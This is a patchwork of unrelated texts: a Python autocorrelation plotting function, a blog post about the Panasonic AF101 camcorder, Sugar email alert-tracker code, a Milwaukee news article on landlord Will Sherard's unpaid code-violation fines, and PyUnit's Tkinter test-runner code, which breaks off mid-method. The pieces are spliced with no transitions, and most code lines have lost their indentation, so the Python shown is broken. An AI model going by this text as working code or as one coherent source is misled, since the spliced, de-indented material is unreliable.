transform=axs[0].transAxes)
fig.subplots_adjust(hspace=0.)
# save fig at canonical path
if save:
# export data files if not existing yet
try:
obs_path = univariate._get_obs_path(write=False)
except text.MissingFolderError:
univariate.write_text()
if condition_label is None:
univc = univariate.master
else:
univc = univariate[condition_label]
cdt_path = univc._get_path()
bname = 'plot_twopoints_' + obs.name + '_' + univariate.region.name + ext
fname = os.path.join(cdt_path, bname)
fig.savefig(fname, bbox_inches='tight', pad_inches=0)
if verbose:
print('Figure saved as {}'.format(fname))
return fig
def plot_stationary(stationary, show_cdts='all',
axe_xsize=6., axe_ysize=2.,
time_range=(None, None),
time_fractional_pad=.1,
time_guides=[0., ],
counts_range=(None, None),
counts_fractional_pad=.1,
corr_range=(None, None), # auto
counts_logscale=False,
corr_fractional_pad=.1,
corr_logscale=False,
corr_guides=[0., ],
show_exp_decay=None,
show_legend=True, show_cdt_details_in_legend=False,
use_obs_name=None,
save=False, ext='.png', verbose=False):
"""Plot stationary autocorrelation.
Parameters
----------
stationary : StationaryUnivariate or StationaryBivariate instance
axe_xsize : float (default 6)
size (in inches) of the x-axis
axe_ysize : float (default 2)
size (in inches) of the individual y-axis
time_range : couple of floats
bounds for time (x-axis)
time_fractional_pad : float
fractional padding for x-axis
counts_range : couple of ints
bounds for counts axis
counts_fractional_pad : float
fractional padding for counts axis
corr_range : couple of floats
bounds for correlation values
counts_logscale : bool {False, True}
use logscale for counts axis
corr_fractional_pad : float
fractional padding for correlation values
corr_logscale : bool {False, True}
use logscale for correlation values (symlog is used to display
symmetrically negative values)
corr_guides : list of float
values where to plot shaded grey horizontal lines
show_exp_decay : float (default None)
whether to plot an exponential decay with corresponding rate
exp(-rate * t)
save : bool {False, True}
whether to save plot at canonical path
use_obs_name : str (default None)
when filled, the plot title will use this observable name instead
of looking for the observable registered name
ext : str {'.png', '.pdf'}
extension used for file
Returns
-------
fig : Figure instance
"""
if not (isinstance(stationary, StationaryUnivariate) or
isinstance(stationary, StationaryBivariate)):
        msg = ('Input is not an instance of {} or of {}'
               .format(StationaryUnivariate, StationaryBivariate))
raise TypeError(msg)
if isinstance(stationary, StationaryUnivariate):
obs = stationary.obs
timelabel = _set_timelabel(obs, use_tref=False)
elif isinstance(stationary, StationaryBivariate):
obs = [uni.obs for uni in stationary.univariates]
timelabel = _set_timelabel(obs[0], use_tref=False)
if 'minutes' in timelabel:
units = 'mins'
prefix = 't'
else:
units = '' # generations are used
prefix = 'g'
timelabel = r'$\Delta$'+timelabel
nplots = 2
fig = plt.figure(figsize=(axe_xsize, (nplots + 1)*axe_ysize))
gs = gridspec.GridSpec(nplots + 1, 1)
ax1 = fig.add_subplot(gs[0])
ax2 = fig.add_subplot(gs[1:])
# build condition list
if isinstance(stationary, StationaryUnivariate):
conditions = _set_condition_list(stationary.univariate, show_cdts=show_cdts)
elif isinstance(stationary, StationaryBivariate):
conditions = []
conditions_0 = _set_condition_list(stationary.univariates[0], show_cdts=show_cdts)
conditions_1 = _set_condition_list(stationary.univariates[1], show_cdts=show_cdts)
# intersect
for cdt in conditions_0:
if cdt in conditions_1:
conditions.append(cdt)
all_times = []
all_counts = []
all_corrs = []
main_handles = [] # for legend
ci_handles = []
for index, cdt in enumerate(conditions):
if cdt == 'master':
c_repr = 'master'
c_label = 'all samples'
lw = default_lw + 1
alpha = 1
alpha_fill = .5
else:
c_repr = repr(cdt)
if show_cdt_details_in_legend:
c_label = str(cdt)
else:
c_label = cdt.label
lw = default_lw
alpha = .8
alpha_fill = 0.3
array = stationary[c_repr].array
nonzero = np.where(array['counts'] > 1) # 1 sample does not have std
dts = array['time_interval'][nonzero]
all_times.extend(dts)
counts = array['counts'][nonzero]
all_counts.extend(counts)
if isinstance(stationary, StationaryUnivariate):
corr = array['auto_correlation'][nonzero]
else:
corr = array['cross_correlation'][nonzero]
try:
dev = array['std_dev'][nonzero]
except ValueError:
dev = None
# counts
label = '{}'.format(c_label)
line, = ax1.plot(dts, counts, lw=lw, alpha=alpha, label=label)
main_handles.append(line)
        col = line.get_color()  # useful at a later stage
# autocorrelation: divide by variance
if isinstance(stationary, StationaryUnivariate):
norm = corr[0]
# cross-correlation: divide covariance by product of standard devs
elif isinstance(stationary, StationaryBivariate):
prod = 1.
for single in stationary.univariates:
prod *= np.sqrt(single[c_repr].stationary.autocorr[0])
norm = prod
dat, = ax2.plot(dts, corr/norm, color=col,
lw=lw, alpha=alpha, label=label)
all_corrs.extend(corr/norm)
if dev is not None:
se = 2.58 * dev / np.sqrt(counts)
ci = ax2.fill_between(dts, (corr-se)/norm, (corr+se)/norm,
facecolor=col, alpha=alpha_fill,
label='.99 C.I.')
ci_handles.append(ci)
all_corrs.extend((corr-se)/norm)
all_corrs.extend((corr+se)/norm)
# vertical lines for timing
for val in time_guides:
ax2.axvline(val, ls=':', color='C7', alpha=.5)
# horizontal lines for correlation ref
for val in corr_guides:
ax2.axhline(val, ls=':', color='C7', alpha=.5)
# ## limits and ticks ##
# xaxis
for ax in [ax1, ax2]:
left, right = _set_axis_limits(ax, all_times, which='x',
pad=time_fractional_pad,
force_range=time_range)
ax.xaxis.set_major_locator(ticker.MaxNLocator(integer=True))
if show_exp_decay is not None:
tt = np.linspace(left, right, 100)
yy = np.exp(-show_exp_decay*np.abs(tt))
lab = r'${}_{{\mathrm{{decay}}}} = {:.1f}$ {}'.format(prefix, 1./show_exp_decay, units)
ref, = ax2.plot(tt, yy, '-.', color='C7', alpha=1,
label=lab)
main_handles.append(ref)
# ## yaxis limits ##
# counts
formatter = ticker.ScalarFormatter(useMathText=True, useOffset=False)
formatter.set_powerlimits((-2, 4))
if not counts_logscale:
_set_axis_limits(ax1, all_counts, which='y', pad=counts_fractional_pad,
force_range=counts_range)
ax1.yaxis.set_major_locator(ticker.MaxNLocator(nbins=3, integer=True))
ax1.yaxis.set_major_formatter(formatter)
        t = ax1.yaxis.get_offset_text()
        plt.draw()
        msg = t.get_text()
        ax1.text(0, .95, msg, ha='left', va='top', transform=ax1.transAxes)
        t.set_visible(False)
else:
        ax1.set_yscale('symlog', linthreshy=1)
# corr
if not corr_logscale:
bottom, top = _set_axis_limits(ax2, all_corrs, which='y',
pad=corr_fractional_pad,
force_range=corr_range)
if top > 2 or bottom < -2:
locator = ticker.MaxNLocator(nbins=5, integer=True)
else:
locator = ticker.FixedLocator([-1, -.5, 0., .5, 1])
ax2.yaxis.set_major_locator(locator)
ax2.yaxis.set_major_formatter(formatter)
        t = ax2.yaxis.get_offset_text()
        plt.draw()
        msg = t.get_text()
        ax2.text(0, .95, msg, ha='left', va='top', transform=ax2.transAxes)
        t.set_visible(False)
else:
ax2.set_yscale('symlog', linthreshy=0.1, linscaley=0.2,
subsy=[2, 3, 4, 5, 6, 7, 8, 9])
if corr_range[0] is not None and corr_range[0] > 0.:
ax2.set_ylim(bottom=corr_range[0])
ax1.tick_params(axis='x', direction='in', bottom='on', labelbottom='on', pad=-10)
ax2.set_xlabel(timelabel, x=.95, horizontalalignment='right',
fontsize='medium')
# hide intermediate x axis
ax1.spines['bottom'].set_visible(False)
ax1.tick_params(axis='x', colors='C7')
ax2.spines['top'].set_color('C7')
# ylabels
ax1.set_ylabel(r'Counts', fontsize='medium')
if isinstance(stationary, StationaryUnivariate):
ax2.set_ylabel(r'$\tilde{{a}}(\Delta {})$'.format(prefix), fontsize='medium')
elif isinstance(stationary, StationaryBivariate):
ax2.set_ylabel(r'$\tilde{{c}}(\Delta {})$'.format(prefix), fontsize='medium')
    # writing observable
# case: obs is a single observable
if isinstance(stationary, StationaryUnivariate):
msg = '{}:{}'.format(obs.latexify(shorten_time_variable=True, use_name=use_obs_name),
obs.latexify(plus_delta=True, shorten_time_variable=True, use_name=use_obs_name))
# case: obs is a couple of observables
else:
if use_obs_name is not None:
if isinstance(use_obs_name, str):
use_name_0 = use_obs_name
use_name_1 = None
else:
if len(use_obs_name) == 1:
use_name_0 = use_obs_name[0]
use_name_1 = None
else:
use_name_0 = use_obs_name[0]
use_name_1 = use_obs_name[1]
else:
use_name_0 = None
use_name_1 = None
msg = '{}:{}'.format(obs[0].latexify(shorten_time_variable=True,
use_name=use_name_0),
obs[1].latexify(plus_delta=True, shorten_time_variable=True,
use_name=use_name_1))
ax1.text(0.5, 1+.2/axe_ysize, r'{}'.format(msg),
size='large',
horizontalalignment='center',
verticalalignment='bottom',
transform=ax1.transAxes)
# ## legend ##
# C.I.
if ci_handles:
ci = ci_handles[0]
# ci.set_color('C7')
ci.set_label('.99 C.I.')
main_handles.append(ci)
handles = main_handles[:]
labels = [h.get_label() for h in handles]
if show_legend:
ax2.legend(handles=handles, labels=labels, loc='upper left',
bbox_to_anchor=(0, -.25/axe_ysize), labelspacing=.2)
fig.subplots_adjust(hspace=0)
if save:
# get univariate instance to get path where to save figure
bname = 'plot_stationary_'
try:
obs_path = stationary._get_obs_path(write=False)
except text.MissingFolderError:
stationary.write_text()
obs_path = stationary._get_obs_path(write=False)
obsname = os.path.basename(obs_path)
bname += obsname + '_'
bname += stationary.region.name + ext
fname = os.path.join(obs_path, bname)
fig.savefig(fname, bbox_inches='tight', pad_inches=0)
if verbose:
print('Figure saved as {}'.format(fname))
return fig
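# Minimal usage sketch (hypothetical objects computed elsewhere with
# tunacell's statistics API; `univ` is a Univariate, `stat` a
# StationaryUnivariate):
#
#   fig1 = plot_onepoint(univ, show_cdts='all', show_ci=True)
#   fig2 = plot_twopoints(univ, ntrefs=4, show_exp_decay=0.02)
#   fig3 = plot_stationary(stat, show_exp_decay=0.02)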
We’ve always loved blurring the background and making films look grainy and cinematic in post-production for our conventional videos. A few months ago this new Panasonic AF101 camera spoke to me, promised the world and allowed me to do all this live while filming. This is one of the new breeds of camcorders offering incredible depth of field using standard digital single-lens reflex (SLR/DSLR) camera lenses.
It’s a big step change for us as we’re very much into the reporter “run and gun” style of filming. By that I mean we often have short deadlines and increasingly shorter budgets which mean we’ve adapted to getting the most from a shoot day. We record footage very quickly to maximise our time on site and then add the “extras” and beauty to the video in post-production.
So the idea of fiddling about with lenses and ISO settings while on a shoot location to get the perfectly balanced shot with a blurred background is an alien concept to us, but we’re loving the challenge! When I took the Panasonic AG-AF101 body out of its box it felt very intuitive and easy to set up. However, worryingly, after 10 or 15 minutes of fiddling there was no picture! I tried changing the adapter and the lens but still nothing.
Oh, and if anyone knows of a good shoulder mount for the Panasonic AF101 please let me know; I’m a bit loath to pay over £2000 for a piece of slightly curved metal and a rolling pin handle!
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
import email
import email.utils
import gtk
from gettext import gettext as _
from sugar.graphics.icon import Icon
from sugar.graphics import alert
from tags import FLAGS, HARDCODED
def ugly_hack(self, papa, pspec, value):
if pspec.name=='msg':
if self._msg != value:
self._msg = value
self._msg_label.set_markup(self._msg)
else:
papa.do_set_property(self, pspec, value)
class ProgressAlert(alert.Alert):
def __init__(self, *args, **kwds):
alert.Alert.__init__(self, *args, **kwds)
icon = Icon(icon_name='emblem-busy')
self.props.icon = icon
icon.show()
do_set_property = lambda self, pspec, value: ugly_hack(self, alert.Alert, pspec, value)
class ErrorAlert(alert.NotifyAlert):
def __init__(self, *args, **kwds):
alert.NotifyAlert.__init__(self, *args, **kwds)
icon = Icon(icon_name='emblem-notification')
self.props.icon = icon
icon.show()
do_set_property = lambda self, pspec, value: ugly_hack(self, alert.NotifyAlert, pspec, value)
class ProgressTracker(object):
def __init__(self, activity, title):
self._activity = activity
self._title = title
self._alert = ProgressAlert()
self._alert.props.title = title
#self._activity.add_alert(self._alert)
def _remove_alert(self, *args):
gtk.gdk.threads_enter()
self._activity.remove_alert(self._alert)
gtk.gdk.threads_leave()
def done(self):
self._remove_alert()
def update(self, msg):
gtk.gdk.threads_enter()
self._alert.props.msg = msg
gtk.gdk.threads_leave()
def error(self, msg, remove_old=True):
if remove_old: self._remove_alert()
gtk.gdk.threads_enter()
notify(self._activity, self._title, msg)
gtk.gdk.threads_leave()
class InboundTracker(ProgressTracker):
def __init__(self, activity):
ProgressTracker.__init__(self, activity, _('Checking email'))
def dump_msg(self, msg_str):
        # TODO setting of FLAGS['has_attachment'], filtering(!)
msg = email.message_from_string(msg_str)
ms = self._activity.ms
key = ms.add_msg(msg)
        # if add_msg thinks it's a duplicate, don't associate it
        if key == -1:
            return
# gmail sent emails hack
'''
if email.utils.parseaddr(msg['From'])[1]==self._activity.config.transport_account._from_addr:
ms.flag(key, FLAGS['sent'])
else:
ms.associate(HARDCODED['inbox'], key)
'''
ms.associate(HARDCODED['inbox'], key)
class OutboundTracker(ProgressTracker):
def __init__(self, activity):
ProgressTracker.__init__(self, activity, _('Sending email'))
def _add_and_flag(self, msg, flag):
ms = self._activity.ms
key = ms.add_msg(msg)
ms.flag(key, flag)
def try_later(self, msgs):
for msg in msgs:
self._add_and_flag(msg, FLAGS['outbound'])
def error_delivering(self, msg):
self._add_and_flag(msg, FLAGS['draft'])
        ProgressTracker.error(self, _('Error delivering <i>%s</i>, message saved as draft.') % msg['Subject'], remove_old=False)
def some_rcpts_failed(self, msg, who):
msg['To'] = '; '.join(who)
self._add_and_flag(msg, FLAGS['draft'])
        ProgressTracker.error(self, _('Error delivering <i>%s</i> to %s; saved as draft.') % (msg['Subject'], ', '.join(who)), remove_old=False)
def sent(self, msg):
self._add_and_flag(msg, FLAGS['sent'])
def notify(activity, title, msg, timeout=5):
alert = ErrorAlert(timeout)
alert.props.title = title
alert.props.msg = msg
activity.add_alert(alert)
alert.connect('response', lambda x,y: activity.remove_alert(alert))
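# A minimal usage sketch of the intended flow (note that add_alert() is
# currently commented out in ProgressTracker.__init__, so the progress
# alert itself is never shown; error() still raises a timed ErrorAlert
# through notify()):
#
#     tracker = InboundTracker(activity)
#     tracker.update(_('Connecting...'))
#     tracker.dump_msg(raw_message_string)
#     tracker.done()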
|
Will Sherard, one of Milwaukee's most notorious inner-city landlords, has long taken advantage of the system by routinely paying the bare minimum on fines for hundreds of building code violations, even as he pays cash to acquire new properties.
That game may be ending.
City attorneys have asked the Municipal Court to make Sherard prove he cannot afford to pay his fines, including $48,800 that was due last week. Presiding Municipal Court Judge Philip Chavez scheduled a hearing on the matter for next week. The city took the step after a Journal Sentinel investigation exposed ways that landlords, including Sherard, game the legal system.
The Journal Sentinel investigation found that Chavez and other municipal court judges have allowed landlords — who in some cases owe tens of thousands of dollars in fines — to take advantage of payment plans that allow them to pay as little as $100 every three months. In Sherard's case, it would take him between 17 and 25 years at the current pace to pay his largest fines of $10,000 each.
In the wake of the Journal Sentinel investigation, Mayor Tom Barrett and other officials said they would be cracking down on the practice. Officials from the City Attorney's Office said they had filed a standing objection to challenge payment plans sought by landlords hit with fines for code violations.
'Our office has met with Chavez ... to lodge a standing objection on a going-forward basis to installment plans and (is) asking for hearings if that's going to happen,' veteran assistant city attorney Gregg Hagopian said during an April 25 interview, in which he was joined by Barrett.
Deputy City Attorney Adam Stephens, who oversees building code enforcement matters, confirmed later that day that a standing objection to the payment plans had been made.
But no such motion had been filed until Thursday — the day Sherard's bill came due.
Chavez, for his part, said he met with Stephens several weeks ago and the subject of objecting to payment plans came up, although nothing was filed and no firm request was made. The judge added that he was unsure whether it was even feasible for the court to approve a standing objection to all payment plan requests.
Thus the city now plans to focus on about a dozen landlords with the most in outstanding fines and file motions on their individual cases.
City Attorney Grant Langley did not respond to requests for comment for this story.
Stephens said seeking payment hearings is one of several steps the city will be taking to crack down on landlords who do not pay fines.
Sherard and other landlords have long taken advantage of the Municipal Court's walk-in policy. The court allows people who are cited with municipal ordinance violations to come to court and deal with certain matters without an appointment — and without a prosecutor in attendance. For example, scheduling a hearing date or seeking an extension to pay fines may be dealt with during the walk-in periods.
The policy is designed to help people with busy schedules appear before a judge, but the Journal Sentinel investigation showed Sherard has used it to repeatedly get more time to pay his fines.
On Oct. 25, 2011, Chavez fined Sherard $45,184 for about 100 building code violations on six properties he owns. Since then, Sherard has come to court every 60 to 90 days when the fines were due, paid $100 on each of six fines and asked Chavez for a payment extension — a request that has been routinely approved.
As a result, Sherard has paid only $5,584 on those fines without ever being considered delinquent.
During the same period, Sherard or his Morocco Investments LLC has paid $636,000 in cash to buy 63 houses at weekly sheriff's sales. Sherard has been a landlord for a half-century and has twice been convicted of misdemeanor unfair rental practices. Records show he or Morocco owns more than 100 Milwaukee rental properties.
In 2011, Sherard came up with $700,000 in one week when a federal judge jailed him for contempt after he repeatedly failed to produce the cash needed for lead paint abatement on his properties. Last year, in a separate matter, instead of seizing 31 properties on which Sherard owed delinquent taxes, the city sued him in Milwaukee County Circuit Court and won a $119,429 judgment.
The suit was filed because city officials said some landlords buy properties on the cheap — often at weekly sheriff's sales of properties foreclosed when borrowers fail to pay their mortgages. When buyers don't pay property taxes, the city typically seizes the homes after three years. That erases the owner's debt and sticks taxpayers with the deed to an often dilapidated property.
Chavez has said he hasn't considered how much in assets Sherard — or other landlords who seek extensions — have because city prosecutors have never brought the matter up. The judge has said he can only consider the evidence before him.
City attorneys have said they don't present the evidence because they never know when a defendant will appear to seek an extension due to the walk-in policy.
The practice has been going on for decades, said David Halbrooks, who was an assistant city attorney in the 1990s and then served briefly as a municipal judge.
'It was frequently frustrating because defendants would be able to come in on their own without the city being represented,' Halbrooks said.
As a result, 'the payment plan would become a legal strategy,' he said.
He noted that instead of payment hearings after the fact, 'it might be more efficient to have the discussion regarding a payment plan at the time of sentencing' when the fine is imposed and when a prosecutor is present.
On Thursday, the day that 14 of Sherard's fines — including the six spotlighted in the Journal Sentinel story — came due, the city filed a motion asking to be notified so it could object to a new extension.
'We don't want any more partial payments,' said Patrick Leigl, the assistant city attorney who filed the objection.
The motion cites 22 Sherard or Morocco cases with fines totaling nearly $70,000. Sherard 'has surpassed a reasonable time to satisfy the total forfeiture judgment,' Leigl wrote in the motion. The fines cover infractions dating to 2009.
Although the fines were due Thursday, the Municipal Court automatically grants defendants a 10-day grace period before enforcement action is taken. Enforcement steps can include sending the debt to collection, issuing warrants or imposing property liens.
Sherard came to the walk-in court Monday, presumably to make nominal payments and seek a new extension to pay his fines. Instead, he was greeted by the city motion.
Chavez ordered a hearing for June 3, rejecting requests by Sherard — who frequently represents himself — for more time to prepare a case.
'I don't know what that means,' Sherard said, referring to the city's action.
Sherard complained that the city and court were taking the actions because of the Journal Sentinel stories.
Sherard rushed out of the courtroom after the Monday court session. Reached by phone Tuesday, Sherard told a reporter 'let me get back to you.' He has not called back.
To read the Journal Sentinel's investigation into how landlords have been gaming the system when it comes to paying fines, go to jsonline.com/landlordgames. |
#!/usr/bin/env python
"""
GUI framework and application for use with Python unit testing framework.
Execute tests written using the framework provided by the 'unittest' module.
Further information is available in the bundled documentation, and from
http://pyunit.sourceforge.net/
Copyright (c) 1999, 2000, 2001 Steve Purcell
This module is free software, and you may redistribute it and/or modify
it under the same terms as Python itself, so long as this copyright message
and disclaimer are retained in their original form.
IN NO EVENT SHALL THE AUTHOR BE LIABLE TO ANY PARTY FOR DIRECT, INDIRECT,
SPECIAL, INCIDENTAL, OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE USE OF
THIS CODE, EVEN IF THE AUTHOR HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH
DAMAGE.
THE AUTHOR SPECIFICALLY DISCLAIMS ANY WARRANTIES, INCLUDING, BUT NOT
LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A
PARTICULAR PURPOSE. THE CODE PROVIDED HEREUNDER IS ON AN "AS IS" BASIS,
AND THERE IS NO OBLIGATION WHATSOEVER TO PROVIDE MAINTENANCE,
SUPPORT, UPDATES, ENHANCEMENTS, OR MODIFICATIONS.
"""
__author__ = "Steve Purcell ([email protected])"
__version__ = "$Revision: 2.0 $"[11:-2]
import unittest
import sys
import Tkinter
import tkMessageBox
import traceback
import string
tk = Tkinter # Alternative to the messy 'from Tkinter import *' often seen
##############################################################################
# GUI framework classes
##############################################################################
class BaseGUITestRunner:
"""Subclass this class to create a GUI TestRunner that uses a specific
windowing toolkit. The class takes care of running tests in the correct
manner, and making callbacks to the derived class to obtain information
or signal that events have occurred.
"""
def __init__(self, *args, **kwargs):
self.currentResult = None
self.running = 0
self.__rollbackImporter = None
self.initGUI(*args, **kwargs)
def getSelectedTestName(self):
"Override to return the name of the test selected to be run"
pass
def errorDialog(self, title, message):
"Override to display an error arising from GUI usage"
pass
def runClicked(self):
"To be called in response to user choosing to run a test"
if self.running: return
testName = self.getSelectedTestName()
if not testName:
self.errorDialog("Test name entry", "You must enter a test name")
return
if self.__rollbackImporter:
self.__rollbackImporter.rollbackImports()
self.__rollbackImporter = RollbackImporter()
try:
test = unittest.defaultTestLoader.loadTestsFromName(testName)
except Exception:
            exc_type, exc_value, exc_tb = sys.exc_info()
            traceback.print_exception(exc_type, exc_value, exc_tb)
self.errorDialog("Unable to run test '%s'" % testName,
"Error loading specified test: %s, %s" % \
(exc_type, exc_value))
return
self.currentResult = GUITestResult(self)
self.totalTests = test.countTestCases()
self.running = 1
self.notifyRunning()
test.run(self.currentResult)
self.running = 0
self.notifyStopped()
def stopClicked(self):
"To be called in response to user stopping the running of a test"
if self.currentResult:
self.currentResult.stop()
# Required callbacks
def notifyRunning(self):
"Override to set GUI in 'running' mode, enabling 'stop' button etc."
pass
def notifyStopped(self):
"Override to set GUI in 'stopped' mode, enabling 'run' button etc."
pass
def notifyTestFailed(self, test, err):
"Override to indicate that a test has just failed"
pass
def notifyTestErrored(self, test, err):
"Override to indicate that a test has just errored"
pass
def notifyTestStarted(self, test):
"Override to indicate that a test is about to run"
pass
def notifyTestFinished(self, test):
"""Override to indicate that a test has finished (it may already have
failed or errored)"""
pass
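# A minimal, hypothetical console-based subclass, sketching the callback
# contract described in the docstring above; a real runner would override
# the remaining notify* methods as well:
#
#     class ConsoleTestRunner(BaseGUITestRunner):
#         def initGUI(self, testName=''):
#             self._testName = testName
#         def getSelectedTestName(self):
#             return self._testName
#         def errorDialog(self, title, message):
#             print '%s: %s' % (title, message)
#         def notifyTestFailed(self, test, err):
#             print 'FAIL:', test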
class GUITestResult(unittest.TestResult):
"""A TestResult that makes callbacks to its associated GUI TestRunner.
Used by BaseGUITestRunner. Need not be created directly.
"""
def __init__(self, callback):
unittest.TestResult.__init__(self)
self.callback = callback
def addError(self, test, err):
unittest.TestResult.addError(self, test, err)
self.callback.notifyTestErrored(test, err)
def addFailure(self, test, err):
unittest.TestResult.addFailure(self, test, err)
self.callback.notifyTestFailed(test, err)
def stopTest(self, test):
unittest.TestResult.stopTest(self, test)
self.callback.notifyTestFinished(test)
def startTest(self, test):
unittest.TestResult.startTest(self, test)
self.callback.notifyTestStarted(test)
class RollbackImporter:
"""This tricky little class is used to make sure that modules under test
will be reloaded the next time they are imported.
"""
def __init__(self):
self.previousModules = sys.modules.copy()
def rollbackImports(self):
for modname in sys.modules.keys():
if modname not in self.previousModules:
# Force reload when modname next imported
                del sys.modules[modname]
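# Usage sketch (the module name 'sample_tests' is hypothetical): snapshot
# the module table, import code under test, then roll back so the next
# import re-executes the module from disk:
#
#     rollback = RollbackImporter()
#     import sample_tests          # imported fresh
#     rollback.rollbackImports()   # dropped from sys.modules again
#     import sample_tests          # re-imported, picking up any edits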
##############################################################################
# Tkinter GUI
##############################################################################
_ABOUT_TEXT="""\
PyUnit unit testing framework.
For more information, visit
http://pyunit.sourceforge.net/
Copyright (c) 2000 Steve Purcell
<[email protected]>
"""
_HELP_TEXT="""\
Enter the name of a callable object which, when called, will return a \
TestCase or TestSuite. Click 'start', and the test thus produced will be run.
Double click on an error in the listbox to see more information about it, \
including the stack trace.
For more information, visit
http://pyunit.sourceforge.net/
or see the bundled documentation
"""
class TkTestRunner(BaseGUITestRunner):
"""An implementation of BaseGUITestRunner using Tkinter.
"""
def initGUI(self, root, initialTestName):
"""Set up the GUI inside the given root window. The test name entry
field will be pre-filled with the given initialTestName.
"""
self.root = root
# Set up values that will be tied to widgets
self.suiteNameVar = tk.StringVar()
self.suiteNameVar.set(initialTestName)
self.statusVar = tk.StringVar()
self.statusVar.set("Idle")
self.runCountVar = tk.IntVar()
self.failCountVar = tk.IntVar()
self.errorCountVar = tk.IntVar()
self.remainingCountVar = tk.IntVar()
self.top = tk.Frame()
self.top.pack(fill=tk.BOTH, expand=1)
self.createWidgets()
def createWidgets(self):
"""Creates and packs the various widgets.
Why is it that GUI code always ends up looking a mess, despite all the
best intentions to keep it tidy? Answers on a postcard, please.
"""
# Status bar
statusFrame = tk.Frame(self.top, relief=tk.SUNKEN, borderwidth=2)
statusFrame.pack(anchor=tk.SW, fill=tk.X, side=tk.BOTTOM)
tk.Label(statusFrame, textvariable=self.statusVar).pack(side=tk.LEFT)
# Area to enter name of test to run
leftFrame = tk.Frame(self.top, borderwidth=3)
leftFrame.pack(fill=tk.BOTH, side=tk.LEFT, anchor=tk.NW, expand=1)
suiteNameFrame = tk.Frame(leftFrame, borderwidth=3)
suiteNameFrame.pack(fill=tk.X)
tk.Label(suiteNameFrame, text="Enter test name:").pack(side=tk.LEFT)
e = tk.Entry(suiteNameFrame, textvariable=self.suiteNameVar, width=25)
e.pack(side=tk.LEFT, fill=tk.X, expand=1)
e.focus_set()
e.bind('<Key-Return>', lambda e, self=self: self.runClicked())
# Progress bar
progressFrame = tk.Frame(leftFrame, relief=tk.GROOVE, borderwidth=2)
progressFrame.pack(fill=tk.X, expand=0, anchor=tk.NW)
tk.Label(progressFrame, text="Progress:").pack(anchor=tk.W)
self.progressBar = ProgressBar(progressFrame, relief=tk.SUNKEN,
borderwidth=2)
self.progressBar.pack(fill=tk.X, expand=1)
# Area with buttons to start/stop tests and quit
buttonFrame = tk.Frame(self.top, borderwidth=3)
buttonFrame.pack(side=tk.LEFT, anchor=tk.NW, fill=tk.Y)
self.stopGoButton = tk.Button(buttonFrame, text="Start",
command=self.runClicked)
self.stopGoButton.pack(fill=tk.X)
tk.Button(buttonFrame, text="Close",
command=self.top.quit).pack(side=tk.BOTTOM, fill=tk.X)
tk.Button(buttonFrame, text="About",
command=self.showAboutDialog).pack(side=tk.BOTTOM, fill=tk.X)
tk.Button(buttonFrame, text="Help",
command=self.showHelpDialog).pack(side=tk.BOTTOM, fill=tk.X)
# Area with labels reporting results
for label, var in (('Run:', self.runCountVar),
('Failures:', self.failCountVar),
('Errors:', self.errorCountVar),
('Remaining:', self.remainingCountVar)):
tk.Label(progressFrame, text=label).pack(side=tk.LEFT)
tk.Label(progressFrame, textvariable=var,
foreground="blue").pack(side=tk.LEFT, fill=tk.X,
expand=1, anchor=tk.W)
# List box showing errors and failures
tk.Label(leftFrame, text="Failures and errors:").pack(anchor=tk.W)
listFrame = tk.Frame(leftFrame, relief=tk.SUNKEN, borderwidth=2)
listFrame.pack(fill=tk.BOTH, anchor=tk.NW, expand=1)
self.errorListbox = tk.Listbox(listFrame, foreground='red',
selectmode=tk.SINGLE,
selectborderwidth=0)
self.errorListbox.pack(side=tk.LEFT, fill=tk.BOTH, expand=1,
anchor=tk.NW)
listScroll = tk.Scrollbar(listFrame, command=self.errorListbox.yview)
listScroll.pack(side=tk.LEFT, fill=tk.Y, anchor=tk.N)
self.errorListbox.bind("<Double-1>",
lambda e, self=self: self.showSelectedError())
self.errorListbox.configure(yscrollcommand=listScroll.set)
def getSelectedTestName(self):
return self.suiteNameVar.get()
def errorDialog(self, title, message):
tkMessageBox.showerror(parent=self.root, title=title,
message=message)
def notifyRunning(self):
self.runCountVar.set(0)
self.failCountVar.set(0)
self.errorCountVar.set(0)
self.remainingCountVar.set(self.totalTests)
self.errorInfo = []
while self.errorListbox.size():
self.errorListbox.delete(0)
#Stopping seems not to work, so simply disable the start button
#self.stopGoButton.config(command=self.stopClicked, text="Stop")
self.stopGoButton.config(state=tk.DISABLED)
self.progressBar.setProgressFraction(0.0)
self.top.update_idletasks()
def notifyStopped(self):
self.stopGoButton.config(state=tk.ACTIVE)
#self.stopGoButton.config(command=self.runClicked, text="Start")
self.statusVar.set("Idle")
def notifyTestStarted(self, test):
self.statusVar.set(str(test))
self.top.update_idletasks()
def notifyTestFailed(self, test, err):
self.failCountVar.set(1 + self.failCountVar.get())
self.errorListbox.insert(tk.END, "Failure: %s" % test)
self.errorInfo.append((test,err))
def notifyTestErrored(self, test, err):
self.errorCountVar.set(1 + self.errorCountVar.get())
self.errorListbox.insert(tk.END, "Error: %s" % test)
self.errorInfo.append((test,err))
def notifyTestFinished(self, test):
self.remainingCountVar.set(self.remainingCountVar.get() - 1)
self.runCountVar.set(1 + self.runCountVar.get())
fractionDone = float(self.runCountVar.get())/float(self.totalTests)
fillColor = len(self.errorInfo) and "red" or "green"
self.progressBar.setProgressFraction(fractionDone, fillColor)
def showAboutDialog(self):
tkMessageBox.showinfo(parent=self.root, title="About PyUnit",
message=_ABOUT_TEXT)
def showHelpDialog(self):
tkMessageBox.showinfo(parent=self.root, title="PyUnit help",
message=_HELP_TEXT)
def showSelectedError(self):
selection = self.errorListbox.curselection()
if not selection: return
selected = int(selection[0])
txt = self.errorListbox.get(selected)
window = tk.Toplevel(self.root)
window.title(txt)
window.protocol('WM_DELETE_WINDOW', window.quit)
test, error = self.errorInfo[selected]
tk.Label(window, text=str(test),
foreground="red", justify=tk.LEFT).pack(anchor=tk.W)
tracebackLines = traceback.format_exception(*error + (10,))
tracebackText = string.join(tracebackLines,'')
